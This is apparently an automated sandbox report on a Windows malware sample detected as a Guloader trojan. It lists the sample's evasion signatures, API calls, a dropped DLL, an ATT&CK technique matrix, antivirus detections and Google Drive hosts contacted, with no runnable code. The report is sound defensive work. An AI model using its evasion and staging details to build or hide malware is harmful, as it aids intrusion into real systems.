      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Switches to a custom stack to bypass stack traces
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeAPI/Special instruction interceptor: Address: 2FC20BD
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeAPI/Special instruction interceptor: Address: 1BF20BD
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsjE6EA.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe TID: 4220Thread sleep time: -280000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeCode function: 0_2_0040646B FindFirstFileA,FindClose,0_2_0040646B
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeCode function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004058BF
      Source: fbXZ4ErQMU.exe, 00000003.00000003.53282275495.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53618375979.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53058380581.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.54066069249.0000000006E99000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53624432299.0000000006E5C000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000002.56511514177.0000000006E5E000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.54513141564.0000000006E99000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53394052068.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53506009888.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53176252546.0000000006E5C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeAPI call chain: ExitProcess graph end nodegraph_0-4007
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeAPI call chain: ExitProcess graph end nodegraph_0-4012
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeCode function: 0_2_70051A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_70051A98
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeProcess created: C:\Users\user\Desktop\fbXZ4ErQMU.exe "C:\Users\user\Desktop\fbXZ4ErQMU.exe"Jump to behavior
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Native API      		1
      DLL Side-Loading      		1
      Access Token Manipulation      		11
      Masquerading      		OS Credential Dumping11
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		11
      Encrypted Channel      		Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
      Process Injection      		1
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Virtualization/Sandbox Evasion      		Remote Desktop Protocol1
      Clipboard Data      		3
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      DLL Side-Loading      		1
      Access Token Manipulation      		Security Account Manager2
      File and Directory Discovery      		SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
      Process Injection      		NTDS13
      System Information Discovery      		Distributed Component Object ModelInput Capture14
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Obfuscated Files or Information      		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading      		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      fbXZ4ErQMU.exe100%AviraTR/Injector.otkux
      fbXZ4ErQMU.exe61%ReversingLabsWin32.Trojan.Guloader

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\nsjE6EA.tmp\System.dll0%ReversingLabs

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.0%Avira URL Cloudsafe
      http://www.gopher.ftp://ftp.0%Avira URL Cloudsafe
      http://nsis.sf.net/NSIS_ErrorError0%Avira URL Cloudsafe
      http://nsis.sf.net/NSIS_Error0%Avira URL Cloudsafe
      http://www.quovadis.bm00%Avira URL Cloudsafe
      https://ocsp.quovadisoffshore.com00%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      drive.google.com
      		142.250.217.238
      		truefalse
        		high
        drive.usercontent.google.com
        		142.250.64.193
        		truefalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://www.google.comfbXZ4ErQMU.exe, 00000003.00000003.52952093836.0000000006EB7000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945627446.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53506009888.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52833039147.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53176252546.0000000006E5C000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52719203506.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839942849.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53618132021.0000000006EA5000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000002.56511591295.0000000006E7A000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000002.56511638576.0000000006E99000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53058091433.0000000006E90000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839760041.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945802613.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53400172887.0000000006E5C000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53170207947.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53730137731.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52719057837.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839942849.0000000006EB7000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            https://drive.google.com/lifornia1fbXZ4ErQMU.exe, 00000003.00000002.56511770044.0000000006EBA000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              https://drive.google.com/;fbXZ4ErQMU.exe, 00000003.00000003.53057812723.0000000006F09000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                http://nsis.sf.net/NSIS_ErrorfbXZ4ErQMU.exe, fbXZ4ErQMU.exe, 00000000.00000000.51418151882.000000000040A000.00000008.00000001.01000000.00000003.sdmp, fbXZ4ErQMU.exe, 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmp, fbXZ4ErQMU.exe, 00000003.00000000.52634286184.000000000040A000.00000008.00000001.01000000.00000003.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://drive.google.com/8fbXZ4ErQMU.exe, 00000003.00000003.52945802613.0000000006EB8000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945627446.0000000006EB2000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  https://drive.google.com/nt.youtube.comfbXZ4ErQMU.exe, 00000003.00000002.56511770044.0000000006EBA000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://translate.google.com/translate_a/element.jsfbXZ4ErQMU.exe, 00000003.00000002.56511638576.0000000006E99000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53058091433.0000000006E90000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839760041.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945802613.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53400172887.0000000006E5C000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53170207947.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53730137731.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52719057837.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839942849.0000000006EB7000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://drive.google.com/fbXZ4ErQMU.exe, 00000003.00000003.52945627446.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53506009888.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52833039147.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53176252546.0000000006E5C000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839942849.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839760041.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945802613.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53400172887.0000000006E5C000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53170207947.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53730137731.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839942849.0000000006EB7000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214fbXZ4ErQMU.exe, 00000003.00000001.52635170494.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                          		high
                          https://drive.google.com/0fbXZ4ErQMU.exe, 00000003.00000003.52952093836.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53057812723.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945802613.0000000006F09000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://drive.usercontent.google.com/gfbXZ4ErQMU.exe, 00000003.00000003.52951879609.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52726802352.0000000006EBA000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945802613.0000000006EB8000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000002.56511770044.0000000006EBA000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52832764653.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53057962046.0000000006EB9000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52952093836.0000000006EB7000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945627446.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839760041.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839942849.0000000006EB7000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.fbXZ4ErQMU.exe, 00000003.00000001.52635170494.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://drive.google.comfbXZ4ErQMU.exe, 00000003.00000003.52952093836.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000002.56511770044.0000000006EBA000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52726610810.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53057812723.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52833039147.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839942849.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945802613.0000000006F09000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://www.quovadis.bm0fbXZ4ErQMU.exe, 00000003.00000003.52719057837.0000000006EBA000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52951879609.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52726802352.0000000006EBA000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945802613.0000000006EB8000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000002.56511770044.0000000006EBA000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52832764653.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53057962046.0000000006EB9000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52952093836.0000000006EB7000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945627446.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839760041.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839942849.0000000006EB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://drive.usercontent.google.com/fbXZ4ErQMU.exe, 00000003.00000003.52951879609.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52726802352.0000000006EBA000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945802613.0000000006EB8000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000002.56511770044.0000000006EBA000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52832764653.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53057962046.0000000006EB9000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52952093836.0000000006EB7000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945627446.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839760041.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839942849.0000000006EB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
